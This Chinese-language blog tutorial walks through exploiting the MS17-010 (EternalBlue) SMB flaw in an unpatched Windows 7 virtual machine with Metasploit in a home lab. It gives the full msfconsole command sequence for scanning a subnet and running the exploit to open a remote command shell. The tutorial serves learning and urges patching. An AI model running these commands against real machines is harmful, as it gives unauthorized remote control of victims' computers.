使用 msfconsole 的 ms17-010 对Windows7 进行渗透

2017 年横卷网络的勒索软件,就是利用了 Windows7 的SMB漏洞,进行传播.

恶意代码会扫描开放445文件共享端口的Windows机器,无需用户任何操作,只要开机上网,不法分子就能在电脑和服务器中植入勒索软件、远程控制木马、虚拟货币挖矿机等恶意程序。


使用 msfconsole 的 ms17-010 对Windows7 进行渗透

以上所说,只是为了提高一下这个 MS17-010 的知名度.

现在利用msfconsole 进行渗透已经是轻车熟路,老生常谈. 但如果你的电脑还没打补丁,还是打上为好,毕竟安全第一.

环境搭建

使用 virtualbox 或者 VMware workstation 分别安装 Kali Linux 和 Windows7 sp1 (原版是没补丁的),桥接网络,便于通信.

笔者的环境是 virtualbox , black arch 和 Windows7 . Windows7得开一下共享,默认是开放445端口的.

blackarch : 192.168.2.106

Windows7 : 192.168.2.107

扫描系统

启动系统

blackarch 默认登录用户名 root , 密码 blackarch .

Windows7 开启共享,这样才会开放445端口.

在 blackarch 中 输入 msfconsole 启动.


扫描漏洞主机

msf5> search ms17_010


使用 msfconsole 的 ms17-010 对Windows7 进行渗透

msf5 > use auxiliary/scanner/smb/smb_ms17_010

msf5 auxiliary(scanner/smb/smb_ms17_010) > show options


使用 msfconsole 的 ms17-010 对Windows7 进行渗透

可以看到, RHOST 是必须设置的, THREADS 也是必须设置,但是有默认值1了.

msf5 auxiliary(scanner/smb/smb_ms17_010) >set rhosts 192.168.2.0/24

msf5 auxiliary(scanner/smb/smb_ms17_010) >set threads 12

msf5 auxiliary(scanner/smb/smb_ms17_010) >run

此处 rhosts 是扫面整个网段, 如果知道目标主机IP 可以使用 IP 直接代替. 例如笔者的是 192.168.2.107.

设置 threads 线程数,可以影响扫描速度. 扫描结果如图:


使用 msfconsole 的 ms17-010 对Windows7 进行渗透

出现红色描画部分,就说明该主机可能存在漏洞.

渗透攻击

msf5 auxiliary(scanner/smb/smb_ms17_010) > use exploit/windows/smb/ms17_010_eternalblue

msf5 exploit(windows/smb/ms17_010_eternalblue) > show options


使用 msfconsole 的 ms17-010 对Windows7 进行渗透

可以看到, rhosts 是必须设置的,且默认为空.

msf5 exploit(windows/smb/ms17_010_eternalblue) >set rhosts 192.168.2.107

msf5 exploit(windows/smb/ms17_010_eternalblue) >run


使用 msfconsole 的 ms17-010 对Windows7 进行渗透

当出现 "command shell session 1 opened" 出现,已经说明渗透成功了.

如果此时还没出现 session ,直接输入 job + 回车 ,即可进入shell.


使用 msfconsole 的 ms17-010 对Windows7 进行渗透

补充

  1. 默认安装的Windows7是关闭smb共享的,此时是无法渗透成功的.
  2. 目标主机是Windows7 简体中文版,所以终端会话是乱码状态,修改一下终端的编码为 GBK 编码即可.


分享到:


相關文章: